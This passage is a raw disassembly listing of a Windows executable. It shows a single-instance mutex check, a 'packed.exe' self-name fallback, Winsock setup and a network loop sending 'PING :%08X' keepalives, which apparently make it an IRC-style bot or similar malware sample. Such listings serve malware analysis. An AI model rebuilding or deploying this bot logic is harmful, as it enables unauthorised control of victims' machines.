loc_4167D9: ; CODE XREF: sub_4167B9+E�j
xor eax, eax
loc_4167DB: ; CODE XREF: sub_4167B9+1E�j
pop ebp
retn
sub_4167B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167DD proc near ; CODE XREF: sub_40A9CF+8E9�p
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
push dword ptr [eax]
call sub_40ED38
pop ecx
mov [ebp+var_4], eax
leave
retn
sub_4167DD endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_417298
push offset word_416DBA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
mov eax, 12DCh
call sub_416BC0
push ebx
push esi
push edi
mov [ebp-18h], esp
push 2
call ds:dword_4170F4 ; SetErrorMode
and dword ptr [ebp-4], 0
push dword_41DA54
push dword_41DA50
push 3B6h
push dword_41DA4C
push 0
push dword_41DA48
push offset a08xX08x3x08x08 ; "%08x%x%08x%3x%08x%08x"
lea eax, [ebp-115Ch]
push eax
call sub_416B5E ; sprintf
add esp, 20h
and dword ptr [ebp-1128h], 0
jmp short loc_416875
; ---------------------------------------------------------------------------
loc_416868: ; CODE XREF: .text:loc_4168BA�j
mov eax, [ebp-1128h]
inc eax
mov [ebp-1128h], eax
loc_416875: ; CODE XREF: .text:00416866�j
cmp dword ptr [ebp-1128h], 0Ah
jnz short loc_416883
call sub_407148
loc_416883: ; CODE XREF: .text:0041687C�j
push 3E8h
call ds:dword_41709C ; Sleep
lea eax, [ebp-115Ch]
push eax
push 0
push 0
call ds:dword_4170F8 ; CreateMutexA
mov [ebp-12F0h], eax
cmp dword ptr [ebp-12F0h], 0
jz short loc_4168BA
call ds:dword_417064 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_4168BA
jmp short loc_4168BC
; ---------------------------------------------------------------------------
loc_4168BA: ; CODE XREF: .text:004168AC�j
; .text:004168B6�j
jmp short loc_416868
; ---------------------------------------------------------------------------
loc_4168BC: ; CODE XREF: .text:004168B8�j
call sub_403BD3
call sub_405FA3
call sub_40938F
call sub_412FC6
call sub_4102AE
call sub_40E979
push 10h
push offset dword_41DA48
call sub_41055F
pop ecx
pop ecx
push 10h
push offset dword_41DA48
call sub_40ECEB
pop ecx
pop ecx
push 10h
push offset dword_41DA48
call sub_40ED6E
pop ecx
pop ecx
call sub_410422
mov dword_41EC30, eax
call sub_410422
mov dword_41EC34, eax
call sub_410422
mov dword_41EC38, eax
call sub_410422
mov dword_41EC3C, eax
push 104h
lea eax, [ebp-1120h]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
test eax, eax
jnz short loc_416961
push offset byte_41DE30
push offset aPacked_exe ; "packed.exe"
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp loc_4169E1
; ---------------------------------------------------------------------------
loc_416961: ; CODE XREF: .text:00416949�j
lea eax, [ebp-1120h]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp-12F4h], eax
jmp short loc_416983
; ---------------------------------------------------------------------------
loc_416976: ; CODE XREF: .text:loc_4169DF�j
mov eax, [ebp-12F4h]
dec eax
mov [ebp-12F4h], eax
loc_416983: ; CODE XREF: .text:00416974�j
cmp dword ptr [ebp-12F4h], 0
jnz short loc_41699F
push offset byte_41DE30
push offset aPacked_exe ; "packed.exe"
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_4169E1
; ---------------------------------------------------------------------------
loc_41699F: ; CODE XREF: .text:0041698A�j
mov eax, [ebp-12F4h]
movsx eax, byte ptr [ebp+eax-1121h]
cmp eax, 5Ch
jnz short loc_4169DF
mov eax, [ebp-12F4h]
lea eax, [ebp+eax-1120h]
push eax
push offset aPacked_exe ; "packed.exe"
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset aPacked_exe ; "packed.exe"
push offset aPacked_exe_0 ; "packed.exe"
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_4169E1
; ---------------------------------------------------------------------------
loc_4169DF: ; CODE XREF: .text:004169B0�j
jmp short loc_416976
; ---------------------------------------------------------------------------
loc_4169E1: ; CODE XREF: .text:0041695C�j
; .text:0041699D�j ...
call sub_406E8E
lea eax, [ebp-12ECh]
push eax
push 202h
call ds:dword_417264 ; WSAStartup
loc_4169F8: ; CODE XREF: .text:00416A43�j
; .text:00416AA7�j
push 0
push 0
push 0
call sub_40D366
add esp, 0Ch
call sub_409226
and dword ptr [ebp-1124h], 0
and dword ptr [ebp-101Ch], 0
mov dword ptr [ebp-4], 1
loc_416A20: ; CODE XREF: .text:loc_416A6F�j
; .text:00416AC0�j
push 0EA60h
call sub_40CF25
push eax
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_416A71
cmp dword ptr [ebp-101Ch], 19h
jnz short loc_416A45
and dword ptr [ebp-4], 0
jmp short loc_4169F8
; ---------------------------------------------------------------------------
loc_416A45: ; CODE XREF: .text:00416A3D�j
cmp dword ptr [ebp-101Ch], 14h
jnz short loc_416A62
call sub_410422
push eax
push offset aPing08x ; "PING :%08X"
call sub_40D6CB
pop ecx
pop ecx
jmp short loc_416A6F
; ---------------------------------------------------------------------------
loc_416A62: ; CODE XREF: .text:00416A4C�j
mov eax, [ebp-101Ch]
inc eax
mov [ebp-101Ch], eax
loc_416A6F: ; CODE XREF: .text:00416A60�j
jmp short loc_416A20
; ---------------------------------------------------------------------------
loc_416A71: ; CODE XREF: .text:00416A34�j
push 1000h
lea eax, [ebp-1018h]
push eax
call sub_40CF25
push eax
call sub_4053DC
add esp, 0Ch
mov [ebp-1124h], eax
cmp dword ptr [ebp-1124h], 0
jz short loc_416AA3
cmp dword ptr [ebp-1124h], 0FFFFFFFFh
jnz short loc_416AAC
loc_416AA3: ; CODE XREF: .text:00416A98�j
and dword ptr [ebp-4], 0
jmp loc_4169F8
; ---------------------------------------------------------------------------
loc_416AAC: ; CODE XREF: .text:00416AA1�j
and dword ptr [ebp-101Ch], 0
lea eax, [ebp-1018h]
push eax
call sub_40E943
pop ecx
jmp loc_416A20
; ---------------------------------------------------------------------------
aHA db 'hœÝA',0
dw 1868h
dd 0FF0041C3h, 54E8EC75h, 83FFFEC8h, 8BC30CC4h, 6583E865h
dd 32E900FCh, 68FFFFFFh, 41DD94h, 41C31868h, 0EC75FF00h
dd 0FEC832E8h, 0CC483FFh, 0E8658BC3h, 0FFFC4D83h, 0DE383D83h
dd 74000041h, 0DD546811h, 0B4680041h, 0E80041DAh, 0FFFF698Fh
dd 15FF5959h, 417254h, 0D1E8006Ah, 8B000000h, 8964F04Dh
dd 0Dh, 5B5E5F00h
db 0C9h, 0C3h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B3A proc near ; CODE XREF: sub_401000+3C�p
; .text:00402124�p ...
jmp ds:dword_41712C
sub_416B3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B40 proc near ; CODE XREF: sub_401146+7A�p
; sub_4017AA+E�p ...
jmp ds:dword_4171BC
sub_416B40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B46 proc near ; CODE XREF: .text:004012C9�p
; sub_4017AA+22�p ...
jmp ds:dword_4171B8
sub_416B46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B4C proc near ; CODE XREF: .text:00401269�p
; .text:00401722�p ...
jmp ds:dword_4171B4
sub_416B4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B52 proc near ; CODE XREF: .text:0040125E�p
; .text:00401999�p ...
jmp ds:dword_4171B0
sub_416B52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B58 proc near ; CODE XREF: sub_4017AA+5A�p
; sub_4024F3+88�p ...
jmp ds:dword_4171AC
sub_416B58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B5E proc near ; CODE XREF: sub_4018AF+9F�p
; .text:00405816�p ...
jmp ds:dword_4171A8
sub_416B5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B64 proc near ; CODE XREF: sub_4018AF+3B�p
; sub_4018AF+5D�p ...
jmp ds:dword_4171A4
sub_416B64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B6A proc near ; CODE XREF: .text:00401AC6�p
; .text:00401AD9�p ...
jmp ds:dword_4171A0
sub_416B6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B70 proc near ; CODE XREF: sub_401D6E+A5�p
; sub_403260+4C�p ...
jmp ds:dword_41719C
sub_416B70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B76 proc near ; CODE XREF: .text:00401FE3�p
; .text:00402268�p ...
jmp ds:dword_417198
sub_416B76 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B7C proc near ; CODE XREF: .text:00401FB1�p
; sub_402698+24C�p ...
jmp ds:dword_417194
sub_416B7C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B82 proc near ; CODE XREF: .text:00401ED5�p
; .text:0040209A�p ...
jmp ds:dword_417190
sub_416B82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B88 proc near ; CODE XREF: .text:00401E7A�p
; .text:0040221B�p ...
jmp ds:dword_41718C
sub_416B88 endp
; ---------------------------------------------------------------------------
dw 0CCCCh
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B90 proc near ; CODE XREF: .text:00402383�p
; sub_41102F+94�p ...
jmp ds:dword_417188
sub_416B90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B96 proc near ; CODE XREF: .text:0040225A�p
; .text:0040227E�p ...
jmp ds:dword_417184
sub_416B96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B9C proc near ; CODE XREF: sub_4024F3+26�p
; sub_4024F3+46�p ...
jmp ds:dword_417180
sub_416B9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BA2 proc near ; CODE XREF: sub_402698+160�p
; sub_40CA29+F6�p ...
jmp ds:dword_41717C
sub_416BA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BA8 proc near ; CODE XREF: sub_402698+CC�p
; sub_402698+110�p ...
jmp ds:dword_417178
sub_416BA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BAE proc near ; CODE XREF: sub_402698+4B�p
; .text:0040878C�p ...
jmp ds:dword_417174
sub_416BAE endp
; ---------------------------------------------------------------------------
dd 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
sub_416BC0 proc near ; CODE XREF: .text:00403DFB�p
; sub_40546E+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_416BE0
loc_416BCC: ; CODE XREF: sub_416BC0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_416BCC
loc_416BE0: ; CODE XREF: sub_416BC0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_416BC0 endp
; ---------------------------------------------------------------------------
db 0CCh
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BF0 proc near ; CODE XREF: sub_4041B7+D�p
; sub_4041B7+28�p ...
jmp ds:dword_417170
sub_416BF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BF6 proc near ; CODE XREF: sub_406041+67�p
jmp ds:dword_41716C
sub_416BF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BFC proc near ; CODE XREF: sub_406E8E+2B3�p
jmp ds:dword_417168
sub_416BFC endp
; ---------------------------------------------------------------------------
dw 0CCCCh
dd 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
sub_416C10 proc near ; CODE XREF: sub_40821B+61�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_416C31
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_416C81
; ---------------------------------------------------------------------------
loc_416C31: ; CODE XREF: sub_416C10+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_416C3F: ; CODE XREF: sub_416C10+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_416C3F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_416C6A
cmp edx, [esp+4+arg_4]
ja short loc_416C6A
jb short loc_416C72
cmp eax, [esp+4+arg_0]
jbe short loc_416C72
loc_416C6A: ; CODE XREF: sub_416C10+4A�j
; sub_416C10+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_416C72: ; CODE XREF: sub_416C10+52�j
; sub_416C10+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_416C81: ; CODE XREF: sub_416C10+1F�j
pop ebx
retn 10h
sub_416C10 endp
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
dd 2 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
sub_416C90 proc near ; CODE XREF: sub_40821B+30�p
; sub_40821B+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_416CB2
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_416CF3
; ---------------------------------------------------------------------------
loc_416CB2: ; CODE XREF: sub_416C90+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_416CC0: ; CODE XREF: sub_416C90+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_416CC0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_416CEE
cmp edx, [esp+8+arg_4]
ja short loc_416CEE
jb short loc_416CEF
cmp eax, [esp+8+arg_0]
jbe short loc_416CEF
loc_416CEE: ; CODE XREF: sub_416C90+4E�j
; sub_416C90+54�j
dec esi
loc_416CEF: ; CODE XREF: sub_416C90+56�j
; sub_416C90+5C�j
xor edx, edx
mov eax, esi
loc_416CF3: ; CODE XREF: sub_416C90+20�j
pop esi
pop ebx
retn 10h
sub_416C90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416CF8 proc near ; CODE XREF: sub_4088FC+1FA�p
; sub_409226+5C�p ...
jmp ds:dword_417164
sub_416CF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416CFE proc near ; CODE XREF: sub_409226+55�p
; sub_4092A4+55�p ...
jmp ds:dword_417160
sub_416CFE endp
; ---------------------------------------------------------------------------
dd 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
sub_416D10 proc near ; CODE XREF: sub_409226+42�p
; sub_4092A4+42�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_416D31
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_416D31: ; CODE XREF: sub_416D10+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_416D4D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_416D4D: ; CODE XREF: sub_416D10+27�j
or eax, eax
jnz short loc_416D69
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_416DAA
; ---------------------------------------------------------------------------
loc_416D69: ; CODE XREF: sub_416D10+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_416D77: ; CODE XREF: sub_416D10+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_416D77
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_416DA5
cmp edx, [esp+0Ch+arg_4]
ja short loc_416DA5
jb short loc_416DA6
cmp eax, [esp+0Ch+arg_0]
jbe short loc_416DA6
loc_416DA5: ; CODE XREF: sub_416D10+85�j
; sub_416D10+8B�j
dec esi
loc_416DA6: ; CODE XREF: sub_416D10+8D�j
; sub_416D10+93�j
xor edx, edx
mov eax, esi
loc_416DAA: ; CODE XREF: sub_416D10+57�j
dec edi
jnz short loc_416DB4
neg edx
neg eax
sbb edx, 0
loc_416DB4: ; CODE XREF: sub_416D10+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_416D10 endp
; ---------------------------------------------------------------------------
word_416DBA dw 25FFh ; DATA XREF: .text:004093C0�o
; .text:004094F0�o ...
dd offset dword_41715C
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DC0 proc near ; CODE XREF: sub_409479+41�p
; sub_4095A4+162�p
jmp ds:dword_417158
sub_416DC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DC6 proc near ; CODE XREF: sub_4095A4+11B�p
jmp ds:dword_417154
sub_416DC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DCC proc near ; CODE XREF: sub_409CB1+105�p
; sub_409CB1+114�p
jmp ds:dword_417150
sub_416DCC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DD2 proc near ; CODE XREF: sub_409CB1+42�p
; sub_409CB1+88�p
jmp ds:dword_41714C
sub_416DD2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DD8 proc near ; CODE XREF: sub_409CB1+1A�p
; .text:00409F0B�p
jmp ds:dword_417148
sub_416DD8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DDE proc near ; CODE XREF: sub_40A2D2+13E�p
; sub_40A9CF+1F6�p ...
jmp ds:dword_417144
sub_416DDE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DE4 proc near ; CODE XREF: sub_40A8AD+90�p
jmp ds:dword_417140
sub_416DE4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DEA proc near ; CODE XREF: sub_40A9CF+185C�p
jmp ds:dword_41713C
sub_416DEA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DF0 proc near ; CODE XREF: sub_40D420+47�p
; sub_40D4AB+50�p ...
jmp ds:dword_417138
sub_416DF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DF6 proc near ; CODE XREF: sub_40EF59+6B�p
; sub_40EF59+C1�p
jmp ds:dword_417134
sub_416DF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DFC proc near ; CODE XREF: sub_40F040+52�p
; sub_40F040+A8�p
jmp ds:dword_417130
sub_416DFC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416E02 proc near ; CODE XREF: sub_40F040+1E�p
jmp ds:dword_417128
sub_416E02 endp
; ---------------------------------------------------------------------------
dd 712425FFh, 0CCCC0041h, 6450FF6Ah, 0A1h, 448B5000h, 89640C24h
dd 25h, 246C8900h, 246C8D0Ch, 0CCC3500Ch
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416E30 proc near ; CODE XREF: sub_4048EF+4E�p
; sub_4048EF+2CF�p ...
jmp ds:dword_4171F8
sub_416E30 endp
; ---------------------------------------------------------------------------
aJ db 'ÌÌÌÌÌÌÌÌÌÌj',0
dw 74FFh
aSd db '$',8,'èd',0
db 2 dup(0), 0C2h
db 4, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+0Ch]
and dword ptr [ebp-4], 0
test eax, eax
jz short loc_416EA0
mov ecx, [eax]
lea edx, [ebp+0Ch]
push edx
push offset dword_41DDD0
push eax
call dword ptr [ecx]
test eax, eax
jl short loc_416EA0
mov eax, [ebp+0Ch]
push esi
push dword ptr [ebp+10h]
mov ecx, [eax]
push eax
call dword ptr [ecx+0Ch]
mov esi, eax
mov eax, [ebp+0Ch]
push eax
mov ecx, [eax]
call dword ptr [ecx+8]
test esi, esi
pop esi
jnz short loc_416EA0
lea eax, [ebp-4]
push eax
push 0
call ds:dword_4171C8
test eax, eax
jz short loc_416EA0
and dword ptr [ebp-4], 0
loc_416EA0: ; CODE XREF: .text:00416E5B�j
; .text:00416E6D�j ...
push dword ptr [ebp-4]
push dword ptr [ebp+8]
call sub_416EAF
leave
retn 0Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416EAF proc near ; CODE XREF: .text:00416EA6�p
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
lea ecx, [ebp+var_10]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416ED3
lea eax, [ebp+var_10]
push offset dword_4173B8
push eax
call sub_416FA2 ; _CxxThrowException
sub_416EAF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_416ED3 proc near ; CODE XREF: sub_416EAF+11�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov eax, [esp+arg_0]
push esi
mov esi, ecx
and dword ptr [esi+0Ch], 0
mov [esi+4], eax
mov eax, [esp+4+arg_4]
mov dword ptr [esi], offset off_4172B4
test eax, eax
mov [esi+8], eax
jz short loc_416EFF
cmp [esp+4+arg_8], 0
jz short loc_416EFF
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_416EFF: ; CODE XREF: sub_416ED3+1D�j
; sub_416ED3+24�j
mov eax, esi
pop esi
retn 0Ch
sub_416ED3 endp
; ---------------------------------------------------------------------------
byte_416F05 db 56h, 8Bh, 0F1h ; DATA XREF: .rdata:off_4172B4�o
dd 41E8h, 2444F600h, 7740108h, 0FEB2E856h, 8B59FFFFh, 4C25EC6h
dd 24448B00h, 0F18B5604h, 8904488Bh, 408B044Eh, 0C668308h
dd 8468900h, 6C7C085h, 4172B4h, 88B0674h, 451FF50h, 0C25EC68Bh
dd 8B560004h, 8468BF1h, 72B406C7h, 0C0850041h, 88B0674h
dd 851FF50h, 850C768Bh, 560774F6h, 70B015FFh, 0C35E0041h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416F74 proc near ; CODE XREF: .text:00401364�p
; sub_406E8E+DA�p ...
jmp ds:dword_4171C0
sub_416F74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416F7A proc near ; CODE XREF: .text:004021D5�p
; .text:00403AE9�p ...
jmp ds:dword_417114
sub_416F7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416F80 proc near ; CODE XREF: .text:00402AFE�p
; .text:00402CEB�p ...
jmp ds:dword_417118
sub_416F80 endp
; ---------------------------------------------------------------------------
word_416F86 dw 8B56h ; DATA XREF: .rdata:off_4172B4�o
dd 1AE8F1h, 44F60000h, 74010824h, 31E85607h, 59FFFFFEh
dd 0C25EC68Bh
db 4, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416FA2 proc near ; CODE XREF: sub_416EAF+1F�p
jmp ds:dword_41711C
sub_416FA2 endp
; ---------------------------------------------------------------------------
dd 712025FFh, 0CCCC0041h, 0F6008D8Dh, 84E8FFFFh, 0C3FFFFEBh
dd 0E8F04D8Dh, 0FFFFEB7Bh, 88D8DC3h, 0E8FFFFF2h, 0FFFFEB6Fh
dd 0EC8D8DC3h, 0E8FFFFF1h, 0FFFFEB63h, 7350B8C3h, 21E90041h
dd 0FFFFFEh, 6 dup(0)
_text ends
; Section 2. (virtual address 00017000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00017000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 417000h
dword_417000 dd 77DD7F3Eh ; DATA XREF: sub_401000+C6�r
dword_417004 dd 77DD5C55h ; DATA XREF: sub_401000+11A�r
; sub_406C51+96�r
dword_417008 dd 77DD22EAh ; DATA XREF: sub_401000+65�r
; sub_406722+184�r ...
dword_41700C dd 77DD23D7h ; DATA XREF: sub_406722+1C3�r
; .text:0040868A�r ...
dword_417010 dd 77DD59F0h ; DATA XREF: sub_406C51+88�r
dword_417014 dd 77DD590Bh ; DATA XREF: sub_406C51+26�r
dword_417018 dd 77DDACABh ; DATA XREF: .text:00408493�r
dword_41701C dd 77DE042Eh ; DATA XREF: sub_4102AE+62�r
dword_417020 dd 77DE03D2h ; DATA XREF: sub_4102AE+27�r
; sub_4102AE+37�r ...
dword_417024 dd 77DDEBA2h ; DATA XREF: sub_4102AE+17�r
dword_417028 dd 77DD189Ah ; DATA XREF: sub_401000+136�r
; sub_406722+2F9�r ...
align 10h
dword_417030 dd 77E7C657h ; DATA XREF: .text:004084CB�r
; sub_40D043+20B�r ...
dword_417034 dd 77E7513Ch ; DATA XREF: sub_408342+10�r
; sub_408342+4B�r
dword_417038 dd 77E705C5h ; DATA XREF: sub_406D47+41�r
dword_41703C dd 77E74672h ; DATA XREF: sub_406C51+6F�r
dword_417040 dd 77E705B0h ; DATA XREF: sub_406B81+15�r
dword_417044 dd 77E7A837h ; DATA XREF: sub_406B81+47�r
; sub_406B81+95�r ...
dword_417048 dd 77E73CE2h ; DATA XREF: sub_406B81+6E�r
dword_41704C dd 77E7011Ah ; DATA XREF: sub_406B81+BC�r
dword_417050 dd 77E704FCh ; DATA XREF: sub_406A23+15�r
; sub_406AE7+15�r ...
dword_417054 dd 77E805D8h ; DATA XREF: sub_403BD3+B�r
; sub_403BD3+32�r ...
dword_417058 dd 77E7A5FDh ; DATA XREF: sub_403BD3+22�r
; sub_403BD3+4D�r ...
dword_41705C dd 77E75CB5h ; DATA XREF: .text:00403552�r
; sub_407148+18B�r ...
dword_417060 dd 77E6BD13h ; DATA XREF: .text:00402B1E�r
; sub_406E8E+1FE�r
dword_417064 dd 77F5157Dh ; DATA XREF: .text:00402B28�r
; sub_409CB1+CF�r ...
dword_417068 dd 77E79D8Ch ; DATA XREF: sub_401D39+22�r
; sub_406D90+D3�r
dword_41706C dd 77E6CBF9h ; DATA XREF: .text:004019D0�r
dword_417070 dd 77E7727Ah ; DATA XREF: .text:00401A1F�r
; .text:00401A58�r
dword_417074 dd 77E79C90h ; DATA XREF: .text:00401A85�r
; .text:00401A92�r
dword_417078 dd 77E65F4Ch ; DATA XREF: .text:004084A7�r
dword_41707C dd 77E61BB8h ; DATA XREF: .text:00401B47�r
; sub_406E8E+2A5�r
dword_417080 dd 77EB7624h ; DATA XREF: .text:00401BF5�r
dword_417084 dd 77E7FF65h ; DATA XREF: .text:00401C34�r
dword_417088 dd 77E78B82h ; DATA XREF: .text:00401CFC�r
dword_41708C dd 77E79F93h ; DATA XREF: .text:00401336�r
; .text:004034FB�r ...
dword_417090 dd 77E7A099h ; DATA XREF: .text:0040133D�r
; .text:00403502�r ...
dword_417094 dd 77E706B7h ; DATA XREF: .text:0040139D�r
; sub_406041+193�r ...
dword_417098 dd 77E61A54h ; DATA XREF: .text:00401461�r
; sub_406509+91�r
dword_41709C dd 77E61BE6h ; DATA XREF: .text:0040160A�r
; .text:00401738�r ...
dword_4170A0 dd 77E616B4h ; DATA XREF: .text:0040167D�r
; sub_406643+3B�r
dword_4170A4 dd 77E77963h ; DATA XREF: .text:004016B5�r
; .text:00401705�r ...
dword_4170A8 dd 77E70396h ; DATA XREF: sub_401146+11�r
; sub_406E8E+22A�r ...
dword_4170AC dd 77E73628h ; DATA XREF: sub_401146+23�r
; .text:00401E68�r ...
dd 77E79A45h
dword_4170B4 dd 77E7AC37h ; DATA XREF: sub_40A1A7+106�r
dword_4170B8 dd 77E75090h ; DATA XREF: sub_40D74D+87�r
dword_4170BC dd 77E74D76h ; DATA XREF: sub_40D74D+4A�r
dword_4170C0 dd 77E77797h ; DATA XREF: sub_40D74D+33�r
dword_4170C4 dd 77E76C1Ah ; DATA XREF: .text:004083E0�r
dword_4170C8 dd 77E686CCh ; DATA XREF: sub_408E8E+4B�r
; .text:00409062�r
dword_4170CC dd 77E6C0E3h ; DATA XREF: sub_408E8E+1A�r
; .text:00408FAD�r ...
dword_4170D0 dd 77E7751Ah ; DATA XREF: sub_409226:loc_40928E�r
; sub_4092A4:loc_409307�r ...
